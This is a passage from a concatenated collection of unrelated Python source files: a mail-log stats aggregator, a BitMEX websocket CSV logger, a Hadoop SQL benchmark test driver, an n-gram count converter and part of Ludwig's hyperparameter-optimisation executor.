self.wfile.write(json.dumps(stats))
elif command.lower() == 'prettystats':
self.wfile.write(json.dumps(stats, indent=2))
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class StdinReader(Iterator):
def next(self):
try:
line = sys.stdin.readline()
except KeyboardInterrupt:
raise StopIteration
if not line:
raise StopIteration
return line
def isstdin(self):
return True
def main(logs, daemon=False, host='127.0.0.1', port=7777, concurrency=2, local_emails=None, **kwargs):
true_values = ['yes', '1', 'true']
for local_email in local_emails:
try:
search, name, count = local_email.strip('()').split(',')
except ValueError:
logger.error('LOCAL_TUPLE requires 3 fields: %s', local_email)
return -1
local_addresses[search] = (name, count.lower() in true_values)
if local_addresses:
local_addresses_re = re.compile(r'(%s)' % '|'.join(local_addresses.keys()))
logger.debug('Local email pattern: %s', local_addresses_re.pattern)
else:
local_addresses_re = re.compile(r'(?!)')
handlers = (LocalHandler(local_addresses_re), SmtpHandler(), SmtpdHandler())
if daemon:
server = ThreadedTCPServer((host, port), CommandHandler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
logger.info('Listening on %s:%s', host, port)
parser_pool = ParserPool(concurrency)
if not logs or logs[0] is '-':
reader = StdinReader()
else:
reader = fileinput.input(logs)
for line in reader:
try:
parser_pool.add_line(line.strip('\n'), not reader.isstdin())
except Full:
logger.warning('Line parser queue full')
# Dont really care
pass
parser_pool.join()
if not daemon:
print json.dumps(stats, indent=2)
else:
server.shutdown()
return 0
if __name__ == '__main__':
global relay_mode
usage = "usage: %prog [options] file1 file2 ... fileN"
opt_parser = OptionParser(usage)
opt_parser.add_option("-v", "--verbose", dest="verbosity", default=0, action="count",
help="-v for a little info, -vv for debugging")
opt_parser.add_option("-d", "--daemon", dest="daemon", default=False, action="store_true",
help="Run tcp server for getting stats from")
opt_parser.add_option("-p", "--port", dest="port", default=7777, type="int",
help="Port to listen on for grabbing stats", metavar="PORT")
opt_parser.add_option("-i", "--host", dest="host", default="127.0.0.1",
help="Host/IP to listen on for grabbing stats", metavar="HOST")
opt_parser.add_option("-c", "--concurrency", dest="concurrency", default=2, type="int",
help="Number of threads to spawn for handling lines", metavar="NUM")
opt_parser.add_option("-l", "--local", dest="local_emails", default=[], action="append",
help="Search for STRING in incoming email addresses and incr stat NAME and if COUNT, count in incoming - STRING,NAME,COUNT", metavar="LOCAL_TUPLE")
opt_parser.add_option("-r", "--relay-mode", dest="relay", default=False, action="store_true",
help="Activate the aggregator in relay-mode")
(options, args) = opt_parser.parse_args()
if options.verbosity == 1:
logger.setLevel(logging.INFO)
elif options.verbosity == 2:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.ERROR)
relay_mode = options.relay
sys.exit(main(args, **options.__dict__))
|
ws.py
|
import websocket
import threading
import traceback
from time import sleep
import json
import logging
import urllib
import math
from logging.handlers import RotatingFileHandler
from datetime import datetime as dt
import csv
import os
DATA_DIR = 'data/'
MAX_TABLE_LEN = 200
def setup_db(name, extension='.csv'):
"""Setup writer that formats data to csv, supports multiple instances with no overlap."""
formatter = logging.Formatter(fmt='%(asctime)s,%(message)s', datefmt='%d-%m-%y,%H:%M:%S')
date = dt.today().strftime('%Y-%m-%d')
db_path = str(DATA_DIR + name + '/' + name + '_' + date + extension)
handler = RotatingFileHandler(db_path, backupCount=1)
handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(logging.INFO)
logger.addHandler(handler)
return logger
class BitMEXWebsocket:
def __init__(self, wsURL = 'wss://www.bitmex.com/realtime?subscribe=liquidation:XBTUSD,announcement,trade'):
'''Connect to the websocket and initialize data stores.'''
self.logger = logging.getLogger(__name__)
self.logger.debug("Initializing WebSocket.")
self.data = {}
self.keys = {}
self.exited = False
self.liquidation_logger = setup_db('liquidation')
self.announcement_logger = setup_db('announcement')
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL)
self.logger.info('Connected to WS.')
sleep(2)
self.logger.info('Starting...')
sleep(1)
def reset(self):
self.logger.warning('Websocket resetting...')
self.ws.close()
self.liquidation_logger.removeHandler(self.liquidation_logger.handlers[0])
self.announcement_logger.removeHandler(self.announcement_logger.handlers[0])
self.logger.info('Weboscket closed.')
self.logger.info('Restarting...')
self.__init__()
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error
)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
self.logger.debug("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout:
sleep(1)
conn_timeout -= 1
if not conn_timeout:
self.logger.error("Couldn't connect to WS! Exiting.")
self.reset()
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
# If day changes, restart
liq_path = str(DATA_DIR + 'liquidation/liquidation' + '_' + dt.today().strftime('%Y-%m-%d') + '.csv')
ann_path = str(DATA_DIR + 'announcements/announcements' + '_' + dt.today().strftime('%Y-%m-%d') + '.csv')
if not(os.path.exists(liq_path) or os.path.exists(ann_path)):
self.reset()
# self.liquidation_logger.removeHandler(self.liquidation_logger.handlers[0])
# self.announcement_logger.removeHandler(self.announcement_logger.handlers[0])
# self.liquidation_logger = setup_db('liquidation')
# self.announcement_logger = setup_db('announcement')
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
try:
if 'subscribe' in message:
if message['success']:
self.logger.debug("Subscribed to %s." % message['subscribe'])
else:
self.error("Unable to subscribe to %s. Error: \"%s\"" %
(message['request']['args'][0], message['error']))
elif action:
if table not in self.data:
self.data[table] = []
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
if table == 'liquidation':
data = message['data'][0]
self.liquidation_logger.info('%s, %s, %s, %s, %s' % (data['orderID'], data['symbol'],
data['side'], data['price'], data['leavesQty']))
elif table == 'announcement':
data = message['data'][0]
self.announcement_logger.info(' %s, %s, %s' %
(data['id'],data['link'], data['title']))
if len(self.data[table]) > MAX_TABLE_LEN:
self.data[table] = self.data[table][MAX_TABLE_LEN // 2:]
except:
self.logger.error(traceback.format_exc())
def __on_error(self, error):
'''Called on fatal websocket errors. We exit on these.'''
if not self.exited:
self.logger.error("Error : %s" % error)
raise websocket.WebSocketException(error)
self.logger.error('Websocket Error, reseting...')
ws.reset()
def __on_open(self):
'''Called when the WS opens.'''
self.logger.debug("Websocket Opened.")
def __on_close(self):
'''Called on websocket close.'''
self.logger.info('Websocket Closed')
|
p3_test_sql.py
|
#
# Copyright (c) Dell Inc., or its subsidiaries. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
from __future__ import division
import datetime
import logging
import multiprocessing
import random
import re
import sys
import uuid
import queue as Queue
# P3 Libraries
from p3_test_driver import p3_plugin_manager
from p3_test_driver.hadoop_util import kill_all_yarn_jobs, kill_yarn_job
from p3_test_driver.p3_test import TimeoutException
from p3_test_driver.p3_test_hadoop import HadoopTest
from p3_test_driver.p3_util import regex_first_group, record_result, read_file_to_string, glob_file_list
from p3_test_driver.system_command import system_command, time_duration_to_seconds
_default_configs = {
'sqlbatch': {
'queries_per_stream': 0,
'random_seed': 0,
'stream_count': 1,
}
}
class PluginInfo(p3_plugin_manager.IP3Plugin):
def get_plugin_info(self):
return [
{
'class_type': 'test',
'class_name': 'sqlquery',
'class': SqlQueryTest,
},
{
'class_type': 'test',
'class_name': 'sqlbatch',
'class': SqlBatchTest,
},
]
class SqlTest(HadoopTest):
def __init__(self, test_config, default_configs=_default_configs):
super(SqlTest, self).__init__(test_config, default_configs=default_configs)
def configure_environment(self):
config = self.test_config
super(SqlTest, self).configure_environment()
db_type = config['db_type']
if db_type == 'hawq':
if config.get('restart_hawq',False):
system_command('/etc/init.d/hawq stop')
system_command('/etc/init.d/hawq start')
elif db_type == 'impala':
cmd = []
cmd.extend(['impala-shell'])
cmd.extend(['--impalad', '%s:%d' % (config.get('impalad_host','localhost'), config.get('impalad_port',21000))])
cmd.extend(['--database', self.db_name()])
cmd.extend(['-q', 'invalidate metadata'])
system_command(cmd,
print_command=True,
print_output=True,
raise_on_error=True,
shell=False)
def db_name(self):
config = self.test_config
return config['db_name'] % config
class SqlQueryTest(SqlTest):
def __init__(self, test_config, default_configs=_default_configs):
super(SqlQueryTest, self).__init__(test_config, default_configs=default_configs)
def run_test(self):
config = self.test_config
# If run in the optimizer, we don't want to run much longer than the best sample.
if config.get('optimizer_set_timeout') and 'optimizer_best_query_elapsed_sec_mean' in config and 'optimizer_best_query_elapsed_sec_std' in config:
max_query_elapsed_sec = config['optimizer_best_query_elapsed_sec_mean'] + 3*config['optimizer_best_query_elapsed_sec_std']
config['command_timeout_sec'] = 30.0 + max_query_elapsed_sec
logging.info('SqlQueryTest.run_test: Setting command timeout to %0.0f seconds' % config['command_timeout_sec'])
config['_status_node'].set_status('Running query %s' % config['query_filename'])
self.hadoop_authenticate()
self.configure_environment()
with self.metrics_collector_context():
self.start_metrics()
rec = run_query(config)
record_result(rec, rec['result_filename'])
if rec['command_timed_out']:
raise TimeoutException()
if rec['error']:
raise Exception('Query failed')
class SqlBatchTest(SqlTest):
def __init__(self, test_config, default_configs=_default_configs):
super(SqlBatchTest, self).__init__(test_config, default_configs=default_configs)
def run_test(self):
config = self.test_config
config['root_test_uuid'] = config['test_uuid']
child_messages = {}
# Create random query list for each stream
config['query_filenames'] = sorted(glob_file_list(config['query_filespec']))
random.seed(config['random_seed'])
stream_configs = []
queries_per_stream = config.get('queries_per_stream',0)
for stream_id in range(0, config.get('stream_count',1)):
stream_config = config.copy()
stream_config['stream_id'] = stream_id
if config['random_seed'] != 0:
random.shuffle(stream_config['query_filenames'])
if queries_per_stream > 0:
stream_config['query_filenames'] = stream_config['query_filenames'][0:queries_per_stream]
logging.info('Queries for stream %d: %s' % (stream_config['stream_id'], ' '.join(stream_config['query_filenames'])))
stream_configs.append(stream_config)
self.hadoop_authenticate()
self.configure_environment()
with self.metrics_collector_context():
self.start_metrics()
error_count = 0
success_count = 0
t0 = datetime.datetime.utcnow()
# Start stream processes
active_streams = {}
queue = multiprocessing.Queue()
for stream_config in stream_configs:
stream_config = stream_config.copy()
del stream_config['_status_node'] # We can't send this between processes.
stream_id = stream_config['stream_id']
process = multiprocessing.Process(target=run_query_stream, args=(queue, stream_config))
process.start()
active_streams[stream_id] = {'process': process, 'stream_config': stream_config}
# Monitor stream processes
while len(active_streams.keys()) > 0:
# Update status
status_text = 'successful queries=%d, errors=%d' % (success_count, error_count)
status_node = config['_status_node']
status_node.set_status(status_text, destroy_children=False)
# Handle any completed stream processes
for stream_id in active_streams.keys():
process = active_streams[stream_id]['process']
if not process.is_alive():
logging.info('Stream %d is done' % stream_id)
process.join()
return_code = process.exitcode
if return_code != 0:
# An uncaught exception has occured. Normal query failures are not handled here.
logging.error('Stream %d returned error %d' % (stream_id, return_code))
error_count += 1
del active_streams[stream_id]
# Process messages (individual query results, stream results) from stream processes
try:
while True:
# Wait up to 1 second for next message in queue.
message = queue.get(True, 1)
# Create a new test_uuid for this child record.
# The query batch test_uuid is in root_test_uuid.
message['record_uuid'] = str(uuid.uuid4())
message['test_uuid'] = message['record_uuid']
# Record individual message to a file for immediate visibility.
record_result(message, message['result_filename'])
# Also add to child_messages key of the query batch record.
record_type = message['record_type']
if record_type not in child_messages:
child_messages[record_type] = []
child_messages[record_type].append(message)
# Count successful and error queries.
if message['record_type'] == 'query_result':
if message['error']:
error_count += 1
else:
success_count += 1
except Queue.Empty:
pass
except KeyboardInterrupt:
raise
except:
logging.error('Unexpected error: %s' % sys.exc_info()[0])
t1 = datetime.datetime.utcnow()
td = t1 - t0
logging.info('All streams are done')
rec = config.copy()
rec['record_uuid'] = rec['test_uuid']
rec['record_type'] = 'query_batch_summary'
rec['utc_begin'] = t0.isoformat()
rec['utc_end'] = t1.isoformat()
rec['elapsed_sec'] = time_duration_to_seconds(td)
rec['error'] = (error_count > 0)
rec['child_messages'] = child_messages
record_result(rec, rec['result_filename'])
logging.info('successful queries=%d, errors=%d' % (success_count, error_count))
if rec['error']:
raise Exception('Query batch failed')
def run_query_stream(queue, stream_config):
stream_id = stream_config['stream_id']
logging.info('%d: Stream begin' % stream_id)
t0 = datetime.datetime.utcnow()
stream_error = False
for query_index, query_filename in enumerate(stream_config['query_filenames']):
logging.info('%d: query_index=%d, query_filename=%s' % (stream_id, query_index, query_filename))
query_config = stream_config.copy()
del query_config['query_filenames']
query_config['query_index'] = query_index
query_config['query_filename'] = query_filename
run_query(query_config)
if query_config['error']: stream_error = True
# Place query_result record in queue. These will be collected and recorded by SqlBatchTest.run_test().
queue.put(query_config)
t1 = datetime.datetime.utcnow()
td = t1 - t0
rec = stream_config.copy()
rec['record_type'] = 'query_stream_summary'
rec['utc_begin'] = t0.isoformat()
rec['utc_end'] = t1.isoformat()
rec['elapsed_sec'] = time_duration_to_seconds(td)
rec['error'] = stream_error
# Place query_stream_summary record in queue. These will be collected and recorded by SqlBatchTest.run_test().
queue.put(rec)
logging.info('%d: Stream end' % stream_id)
def run_query(query_config):
rec = query_config
print_output = rec.get('print_output',True)
stream_id = rec.get('stream_id', 0)
rec['db_name'] = rec['db_name'] % rec
if rec.get('kill_all_yarn_jobs_before_each_query',False):
kill_all_yarn_jobs()
rec['query_filename_contents'] = read_file_to_string(rec['query_filename'])
shell = False
db_type = rec['db_type']
# Build query command.
if db_type == 'hawq':
cmd = []
cmd.extend(['psql'])
cmd.extend(['-v', 'ON_ERROR_STOP=1'])
cmd.extend(['-d', rec['db_name']])
cmd.extend(['-tAf', rec['query_filename']])
elif db_type == 'hive':
if not 'hiveconf:hive.tez.java.opts' in rec and 'java_opts_xmx_ratio' in rec and 'hiveconf:hive.tez.container.size' in rec:
rec['hiveconf:hive.tez.java.opts'] = '-Xmx%dm' % (rec['hiveconf:hive.tez.container.size'] * rec['java_opts_xmx_ratio'])
hiveconf = []
for k,v in rec.items():
prop = regex_first_group('^hiveconf:(.*)', k)
if prop:
hiveconf.extend(['--hiveconf','"%s=%s"' % (prop, v)])
cmd = []
cmd.extend(['hive'])
cmd.extend(['--database', rec['db_name']])
cmd.extend(['-f', rec['query_filename']])
if 'hive_init_file' in rec:
cmd.extend(['-i', rec['hive_init_file']])
# Record contents of file in result.
rec['hive_init_file_contents'] = read_file_to_string(rec['hive_init_file'])
cmd.extend(hiveconf)
elif db_type == 'impala':
cmd = []
cmd.extend(['impala-shell'])
cmd.extend(['--impalad', '%s:%d' % (rec.get('impalad_host','localhost'), rec.get('impalad_port',21000))])
cmd.extend(['--database', rec['db_name']])
cmd.extend(['-f', rec['query_filename']])
cmd.extend(['-B']) # turn off pretty printing
cmd.extend(['-o', '/dev/null'])
if rec.get('profile_query'):
cmd.extend(['--show_profiles'])
else:
raise('Unknown db_type')
logging.info('%d: # %s' % (stream_id, ' '.join(cmd)))
rec['query_command'] = cmd
t0 = datetime.datetime.utcnow()
# Run query.
return_code, output, errors = system_command(cmd,
print_command=False,
print_output=print_output,
timeout=rec.get('command_timeout_sec',None),
raise_on_error=False,
shell=shell)
t1 = datetime.datetime.utcnow()
td = t1 - t0
rec['utc_begin'] = t0.isoformat()
rec['utc_end'] = t1.isoformat()
rec['elapsed_sec'] = time_duration_to_seconds(td)
rec['error'] = (return_code != 0)
rec['exit_code'] = return_code
rec['command_timed_out'] = (return_code == -1)
rec['output'] = output
rec['errors'] = errors
rec['record_type'] = 'query_result'
# Parse query output to determine elapsed time and rows returned.
if db_type == 'hive':
rec['application_id'] = regex_first_group('\\(Executing on YARN cluster with App id (application_.*)\\)$',
errors, return_on_no_match=None, search=True, flags=re.MULTILINE)
# Extract actual query duration from stderr text. Note that we must find the last occurance of 'Time taken'.
query_elapsed_sec = regex_first_group(
'Time taken: ([0-9.]+) seconds',
errors, return_on_no_match='nan', search=True, flags=re.MULTILINE, match_last=True)
if query_elapsed_sec == 'nan':
logging.warn('Time taken not returned by command.')
rec['error'] = True
rec['query_elapsed_sec'] = float(query_elapsed_sec)
rec['non_query_elapsed_sec'] = rec['elapsed_sec'] - rec['query_elapsed_sec']
# Extract row count from stderr text. Note that some queries will not report fetched rows.
query_rows_returned = regex_first_group(
'Fetched: ([0-9]+) row',
errors, return_on_no_match='0', search=True, flags=re.MULTILINE)
rec['query_rows_returned'] = int(query_rows_returned)
logging.info('error=%d, query_elapsed_sec=%f, non_query_elapsed_sec=%f, query_rows_returned=%d' %
(rec['error'], rec['query_elapsed_sec'], rec['non_query_elapsed_sec'], rec['query_rows_returned']))
elif db_type == 'impala':
# Extract actual query duration from stderr text.
# Fetched 100 row(s) in 0.98s
query_elapsed_sec = regex_first_group(
'Fetched [0-9]+ row\\(s\\) in ([0-9.]+)s',
errors, return_on_no_match='nan', search=True, flags=re.MULTILINE, match_last=True)
if query_elapsed_sec == 'nan':
logging.warn('Time taken not returned by command.')
rec['error'] = True
rec['query_elapsed_sec'] = float(query_elapsed_sec)
rec['non_query_elapsed_sec'] = rec['elapsed_sec'] - rec['query_elapsed_sec']
# Extract row count from stderr text. Note that some queries will not report fetched rows.
query_rows_returned = regex_first_group(
'Fetched ([0-9]+) row\\(s\\)',
errors, return_on_no_match='0', search=True, flags=re.MULTILINE)
rec['query_rows_returned'] = int(query_rows_returned)
logging.info('error=%d, query_elapsed_sec=%f, non_query_elapsed_sec=%f, query_rows_returned=%d' %
(rec['error'], rec['query_elapsed_sec'], rec['non_query_elapsed_sec'], rec['query_rows_returned']))
else:
rec['query_elapsed_sec'] = rec['elapsed_sec']
rec['non_query_elapsed_sec'] = 0.0
rec['query_rows_returned'] = np.nan
# Handle errors.
if rec['error']:
logging.info('%d: return_code=%d' % (stream_id, return_code))
if not print_output:
logging.info('%d: %s' % (stream_id, output))
if db_type == 'hive':
# Kill YARN application
if rec['application_id']:
kill_yarn_job(rec['application_id'])
if errors != '':
if not print_output:
logging.info('%d: %s' % (stream_id, errors))
if not rec['error']:
logging.info('%d: %s: %0.3f seconds' % (stream_id, rec['query_filename'], rec['elapsed_sec']))
return rec
|
daemon.py
|
#!/usr/bin/env python3
import ast
import multiprocessing
from spider.db_agent.db_process import db_process_agent
from spider.ui_agent.show_process import ui_neo4j_agent
from spider.util.conf import db_agent
from spider.util.conf import neo4j_timer
def main():
record = []
process = multiprocessing.Process(target=db_process_agent, args=(ast.literal_eval(db_agent),))
process.start()
record.append(process)
process = multiprocessing.Process(target=ui_neo4j_agent, args=(int(neo4j_timer),))
process.start()
record.append(process)
for process in record:
process.join()
if __name__ == '__main__':
main()
|
counts2bin.py
|
import argparse
from scipy.sparse import dok_matrix, csr_matrix
import numpy as np
import random
import struct
import sys
from multiprocessing import Process, Queue
from Queue import Empty
import ioutils
def worker(proc_num, queue, out_dir, count_dir):
print "counts2bin"
while True:
try:
year = queue.get(block=False)
except Empty:
break
print proc_num, "Processing counts pairs for year", year
bin_file = open(out_dir + str(year) + "-pair_counts.shuf.bin", 'wb')
with open(count_dir + str(year) + "-pair_counts.shuf", 'r') as f:
counts_num = 0
for line in f:
if counts_num % 1000 == 0:
sys.stdout.write("\r" + str(counts_num/1000**2) + "M tokens processed.")
counts_num += 1
word, context, count = line.strip().split()
b = struct.pack('iid', int(word), int(context), float(count))
bin_file.write(b)
print proc_num, "number of counts: " + str(counts_num)
bin_file.close()
print proc_num, "Finished"
def run_parallel(num_procs, out_dir, count_dir, years):
queue = Queue()
for year in years:
queue.put(year)
procs = [Process(target=worker, args=[i, queue, out_dir, count_dir]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Computes various frequency statistics.")
parser.add_argument("out_dir", help="output directory for bin count ngrams pairs")
parser.add_argument("count_dir", help="directory contains count ngrams pairs -pair_counts.shuf")
parser.add_argument("--workers", type=int, default=10)
parser.add_argument("--start-year", type=int, help="start year (inclusive)", default=1800)
parser.add_argument("--end-year", type=int, help="end year (inclusive)", default=2000)
parser.add_argument("--year-inc", type=int, help="end year (inclusive)", default=1)
args = parser.parse_args()
years = range(args.start_year, args.end_year + 1, args.year_inc)
ioutils.mkdir(args.out_dir)
run_parallel(args.workers, args.out_dir + "/", args.count_dir + "/", years)
|
execution.py
|
import datetime
import logging
import os
import uuid
import copy
import json
import multiprocessing
import signal
import shutil
import threading
import time
import warnings
from abc import ABC, abstractmethod
from pathlib import Path
from typing import Union, Optional
from ludwig.api import LudwigModel
from ludwig.backend import RAY, initialize_backend
from ludwig.callbacks import Callback
from ludwig.constants import *
from ludwig.hyperopt.results import TrialResults, HyperoptResults, RayTuneResults
from ludwig.hyperopt.sampling import HyperoptSampler, RayTuneSampler, logger
from ludwig.hyperopt.utils import load_json_values
from ludwig.modules.metric_modules import get_best_function
from ludwig.utils.data_utils import NumpyEncoder
from ludwig.utils.defaults import default_random_seed
from ludwig.utils.misc_utils import (get_available_gpu_memory,
get_from_registry,
hash_dict)
from ludwig.utils.fs_utils import has_remote_protocol, file_lock
from ludwig.utils.tf_utils import get_available_gpus_cuda_string
try:
import ray
from ray.util.queue import Queue as RayQueue
from ray import tune
from ray.tune import register_trainable
from ray.tune.suggest import BasicVariantGenerator, ConcurrencyLimiter
from ray.tune.syncer import get_cloud_sync_client
from ray.tune.utils import wait_for_gpu
from ray.tune.utils.placement_groups import PlacementGroupFactory
from ludwig.backend.ray import RayBackend
except ImportError:
ray = None
get_horovod_kwargs = None
class RayBackend:
pass
class RayRemoteTrainer:
pass
# TODO: refactor this into an interface
def _is_ray_backend(backend) -> bool:
if isinstance(backend, str):
return backend == RAY
return isinstance(backend, RayBackend)
def _get_relative_checkpoints_dir_parts(path: Path):
return path.parts[-2:]
class HyperoptExecutor(ABC):
def __init__(self, hyperopt_sampler: Union[dict, HyperoptSampler],
output_feature: str, metric: str, split: str) -> None:
self.hyperopt_sampler = hyperopt_sampler
self.output_feature = output_feature
self.metric = metric
self.split = split
def _has_metric(self, stats, split):
if not stats:
return False
if split is not None:
if split not in stats:
return False
stats = stats[split]
if self.output_feature not in stats:
return False
stats = stats[self.output_feature]
if self.metric not in stats:
return False
stats = stats[self.metric]
return len(stats) > 0
def _has_eval_metric(self, stats):
if stats is None:
return False
if self.output_feature not in stats:
return False
stats = stats[self.output_feature]
for metric_part in self.metric.split('.'):
if not isinstance(stats, dict) or metric_part not in stats:
return False
stats = stats[metric_part]
return isinstance(stats, float)
def get_metric_score(self, train_stats, eval_stats) -> float:
if self._has_metric(train_stats, TEST):
logger.info(
"Returning metric score from training (test) statistics")
return self.get_metric_score_from_train_stats(train_stats, TEST)
elif self._has_eval_metric(eval_stats):
logger.info("Returning metric score from eval statistics. "
"If skip_save_model is True, eval statistics "
"are calculated using the model at the last epoch "
"rather than the model at the epoch with "
"best validation performance")
return self.get_metric_score_from_eval_stats(eval_stats)
elif self._has_metric(train_stats, VALIDATION):
logger.info(
"Returning metric score from training (validation) statistics")
return self.get_metric_score_from_train_stats(train_stats, VALIDATION)
elif self._has_metric(train_stats, TRAINING):
logger.info("Returning metric score from training split statistics, "
"as no test / validation / eval sets were given")
return self.get_metric_score_from_train_stats(train_stats, TRAINING)
else:
raise RuntimeError(
"Unable to obtain metric score from missing training / eval statistics")
def get_metric_score_from_eval_stats(self, eval_stats) -> Union[float, list]:
stats = eval_stats[self.output_feature]
for metric_part in self.metric.split('.'):
if isinstance(stats, dict):
if metric_part in stats:
stats = stats[metric_part]
else:
raise ValueError(
f"Evaluation statistics do not contain "
f"the metric {self.metric}")
else:
raise ValueError(f"Evaluation statistics do not contain "
f"the metric {self.metric}")
if not isinstance(stats, float):
raise ValueError(f"The metric {self.metric} in "
f"evaluation statistics is not "
f"a numerical value: {stats}")
return stats
def get_metric_score_from_train_stats(self, train_stats, select_split=None, returned_split=None) -> float:
select_split = select_split or VALIDATION
returned_split = returned_split or self.split
if not self._has_metric(train_stats, returned_split):
returned_split = select_split
# grab the results of the model with highest validation test performance
train_valiset_stats = train_stats[select_split]
train_evalset_stats = train_stats[returned_split]
validation_field_result = train_valiset_stats[self.output_feature]
best_function = get_best_function(self.metric)
# results of the model with highest validation test performance
epoch_best_vali_metric, best_vali_metric = best_function(
enumerate(validation_field_result[self.metric]),
key=lambda pair: pair[1]
)
best_vali_metric_epoch_eval_metric = train_evalset_stats[
self.output_feature][self.metric][
epoch_best_vali_metric]
return best_vali_metric_epoch_eval_metric
def sort_hyperopt_results(self, hyperopt_results):
return sorted(
hyperopt_results, key=lambda hp_res: hp_res.metric_score,
reverse=self.hyperopt_sampler.goal == MAXIMIZE
)
@abstractmethod
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
model_load_path=None,
model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> HyperoptResults:
pass
class SerialExecutor(HyperoptExecutor):
def __init__(
self, hyperopt_sampler: HyperoptSampler,
output_feature: str,
metric: str, split: str, **kwargs
) -> None:
HyperoptExecutor.__init__(self, hyperopt_sampler, output_feature,
metric, split)
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
# model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> HyperoptResults:
trial_results = []
trials = 0
while not self.hyperopt_sampler.finished():
sampled_parameters = self.hyperopt_sampler.sample_batch()
metric_scores = []
for i, parameters in enumerate(sampled_parameters):
modified_config = substitute_parameters(
copy.deepcopy(config), parameters)
trial_id = trials + i
model = LudwigModel(
config=modified_config,
backend=backend,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
)
eval_stats, train_stats, _, _ = model.experiment(
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
experiment_name=f'{experiment_name}_{trial_id}',
model_name=model_name,
# model_load_path=model_load_path,
# model_resume_path=model_resume_path,
eval_split=self.split,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
skip_save_processed_input=skip_save_processed_input,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
skip_collect_predictions=True,
skip_collect_overall_stats=False,
random_seed=random_seed,
debug=debug,
)
metric_score = self.get_metric_score(train_stats, eval_stats)
metric_scores.append(metric_score)
trial_results.append(TrialResults(
parameters=parameters,
metric_score=metric_score,
training_stats=train_stats,
eval_stats=eval_stats,
))
trials += len(sampled_parameters)
self.hyperopt_sampler.update_batch(
zip(sampled_parameters, metric_scores))
ordered_trials = self.sort_hyperopt_results(trial_results)
return HyperoptResults(ordered_trials=ordered_trials)
class ParallelExecutor(HyperoptExecutor):
num_workers = 2
epsilon = 0.01
epsilon_memory = 100
TF_REQUIRED_MEMORY_PER_WORKER = 100
def __init__(
self,
hyperopt_sampler: HyperoptSampler,
output_feature: str,
metric: str,
split: str,
num_workers: int = 2,
epsilon: float = 0.01,
**kwargs
) -> None:
HyperoptExecutor.__init__(self, hyperopt_sampler, output_feature,
metric, split)
self.num_workers = num_workers
self.epsilon = epsilon
self.queue = None
@staticmethod
def init_worker():
signal.signal(signal.SIGINT, signal.SIG_IGN)
def _run_experiment(self, hyperopt_dict: dict) -> TrialResults:
parameters = hyperopt_dict["parameters"]
train_stats, eval_stats = run_experiment(**hyperopt_dict)
metric_score = self.get_metric_score(train_stats, eval_stats)
return TrialResults(
parameters=parameters,
metric_score=metric_score,
training_stats=train_stats,
eval_stats=eval_stats,
)
def _run_experiment_gpu(self, hyperopt_dict: dict) -> TrialResults:
gpu_id_meta = self.queue.get()
try:
parameters = hyperopt_dict['parameters']
hyperopt_dict["gpus"] = gpu_id_meta["gpu_id"]
hyperopt_dict["gpu_memory_limit"] = gpu_id_meta["gpu_memory_limit"]
train_stats, eval_stats = run_experiment(**hyperopt_dict)
metric_score = self.get_metric_score(train_stats, eval_stats)
finally:
self.queue.put(gpu_id_meta)
return TrialResults(
parameters=parameters,
metric_score=metric_score,
training_stats=train_stats,
eval_stats=eval_stats,
)
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
# model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
